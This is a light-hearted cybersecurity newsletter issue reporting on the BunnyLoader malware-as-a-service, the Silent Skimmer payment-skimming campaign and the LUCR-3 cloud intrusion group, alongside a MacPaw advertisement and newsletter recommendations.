Oct 03 2023
Welcome to Gone Phishing, your daily cybersecurity newsletter that’s shone a light on cybercrime #HS2 many times, too many times blud ????
Today’s hottest cybersecurity news stories:
???? BunnyLoader: No MaaS, por favor! Malware-as-a-Service appears ????????
???? Bim bimmer who’s got the keys to my Silent Skimmer. Watch out! ????
???? Don’t SaaS me! LUCR-3: Scattered Spider spinning webs in the cloud ☁️
giphy.com
Hey there, cyber warriors! ???????????????? Brace yourselves for a new malware-as-a-service (MaaS) threat on the cybercrime scene. It’s called BunnyLoader ????, and it’s causing quite a buzz among cyber experts. ????
???? What’s BunnyLoader?
BunnyLoader is a sneaky piece of software that can do some nasty things. It can download and execute dangerous payloads, steal your browser credentials and system info, run remote commands on your computer, capture keystrokes, and even mess with your clipboard to swap cryptocurrency wallet addresses! ????????
???? Price Tag: $250 for a Lifetime License
For just $250, you can get BunnyLoader’s lifetime licence. It’s been evolving since its debut on September 4, 2023, with new tricks up its sleeve, including anti-sandbox and antivirus evasion techniques. ????
???? What’s New in the Updates?
Recent updates fixed critical issues like command-and-control problems and SQL injection flaws. BunnyLoader’s author, PLAYER_BUNNY (aka PLAYER_BL), boasts about its fileless loading feature that gives antivirus programs a run for their money. ????????
???? BunnyLoader’s Features:
Monitors active tasks
Tracks infection stats
Controls compromised machines
Steals data like a pro ????????️
???? How Does It Spread?
We’re not entirely sure how BunnyLoader spreads initially, but once it’s in, it plays dirty. It sets up shop in your Windows Registry, checks for sandboxes, and gets to work. It can download more malware, snoop on your keystrokes, and redirect cryptocurrency payments! ????????
???? Malware-as-a-Service Threat
BunnyLoader is a constantly evolving threat. Experts warn it’s getting smarter with each update, making it harder to detect. ????????
Stay vigilant, folks! Make sure your cybersecurity defences are up to date to fend off this fluffy but dangerous BunnyLoader and other lurking threats in the digital wilderness. ????️????
Cybersecurity is more important than ever, and your Mac or PC are no exception. Over time, your Mac or PC can accumulate junk files, malware, and other threats that can slow it down and make it vulnerable to attack.
That’s where MacPaw comes in. MacPaw offers a suite of easy-to-use apps that can help you clean, optimize, and secure your Mac. With MacPaw, you can:
Remove junk files and malware to free up space and improve performance
Protect your privacy by erasing sensitive data
Optimize your startup settings to speed up boot times
Manage your extensions and apps to keep your Mac or PC running smoothly
Since 2008 MacPaw is trusted by over 30 million users worldwide, and it’s the perfect solution for keeping your Mac or PC safe and secure.
Hey, vigilant netizens! ????️ Keep your wallets safe because a financial cyber campaign called Silent Skimmer has been quietly targeting online payment businesses across Asia Pacific, North America, and Latin America for over a year. ????
????️♂️ Who’s Behind It?
The BlackBerry Research and Intelligence Team is on the case, tracing this threat back to a skilled actor fluent in Chinese. They’ve been going after online businesses and point-of-sale (PoS) service providers. ????????
???? How Do They Operate?
These cybercriminals exploit vulnerabilities in web applications, especially those using Internet Information Services (IIS). Their main goal? To compromise payment checkout pages and steal your sensitive payment data. ????????????
???? The Attack Chain:
Once they sneak in, they use open-source tools and clever techniques for privilege escalation and code execution. This leads to a PowerShell-based remote access trojan that lets them control the host. It connects to a remote server for more tools, like download scripts and Cobalt Strike beacons. ????????????
???? What’s the Endgame?
Their ultimate aim is to infiltrate web servers and drop a scraper in the payment checkout service. This sneaky tool quietly snatches your financial info while you innocently enter it on a webpage. ????????️♀️
???? Geolocation Trickery
These cyber crooks choose virtual private servers (VPS) based on their victims’ locations to dodge detection. ????????
???? Opportunistic Approach
Silent Skimmer goes after various industries and regions, suggesting it’s more about seizing opportunities than having a specific plan. ????????
Stay alert, and make sure you’re practising safe online shopping. These cyber threats are lurking everywhere! ????????????
In other news, watch out for scams on dating apps like MeetMe, where crooks are making millions with fake cryptocurrency schemes. Be cautious and stay safe online! ????????????
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
???? HealthHack: Tech is making it easier than ever to reach your fitness goals, from wearable devices to nutrition apps, this newsletter does the research for you, get all the latest health tech gadgets delivered to your inbox.
₿ Crypto Nutshell: A well written and beautifully designed newsletter giving you the lowdown on crypto and web3, highly recommend if interested to get up to date info on the crypto/web3 market.
???? Big Brain: Trending AI news, jobs and tools delivered in 3 minutes per day.
Let us know what you think!
Gif by SpiderVerseMovie on Giphy
Heads up, folks! There’s a new financially motivated attacker on the block, and it goes by the name LUCR-3. This cybercriminal is skilled and has been targeting Fortune 2000 companies across sectors like Software, Retail, Hospitality, Manufacturing, and Telecoms. ????????
???? How LUCR-3 Operates
LUCR-3 doesn’t rely heavily on malware or scripts. Instead, it’s a pro at using your own tools and resources against you. It sneaks into your systems through Identity Providers (IDP) like Okta, Azure AD, and Ping Identity, aiming to steal Intellectual Property (IP) for extortion.
They don’t just stop there; they also target your SaaS applications, learning how your organisation works and snatching sensitive data, including IP, Code Signing Certificates, and customer data. ????️♂️????
???? Attribution Challenge
Identifying LUCR-3 isn’t easy. The cyber intelligence community has been tracking various personas linked to it. Some even seem to have connections to the BlackCat ransomware. ????
⚔️ Weapon of Choice
LUCR-3 uses web browsers and GUI utilities for its mission, especially in Cloud, SaaS, and CI/CD environments. It operates like a savvy employee, making it hard to detect. ????️♀️????
???? LUCR-3’s Mission
Financial gain is the name of the game for LUCR-3. They steal sensitive data like IP and customer info to attempt extortion, often demanding millions of dollars. Some LUCR-3 personas even team up with ALPHV for the extortion phase. ????????
???? Toolset
LUCR-3 prefers Windows 10 systems with GUI utilities. In AWS, they leverage the S3 Browser and AWS Cloudshell. They’re pros at using APIs, access tokens, and more to navigate your systems without raising alarms. ????????
???? Victimology
LUCR-3 often targets big organisations with valuable IP, especially software companies. They also go after Identity Providers and their outsourced services. Recently, they’ve expanded their scope to include sectors like hospitality, gaming, and retail. ????????
???? Attack Lifecycle
LUCR-3 does its homework, carefully choosing victims with the right access. They gain initial access through compromised credentials, bypass MFA, and modify MFA settings. Then, they reconstruct your environment, escalate privileges if needed, and establish persistence. The goal is to maintain their presence and evade detection through various defence evasion tactics. Finally, they complete their mission by stealing sensitive data. ????????
Stay vigilant, strengthen your defences, and be cautious of suspicious activity, especially in your cloud and SaaS environments. Cyber threats like LUCR-3 are always on the prowl. ????️????
So long and thanks for reading all the phish!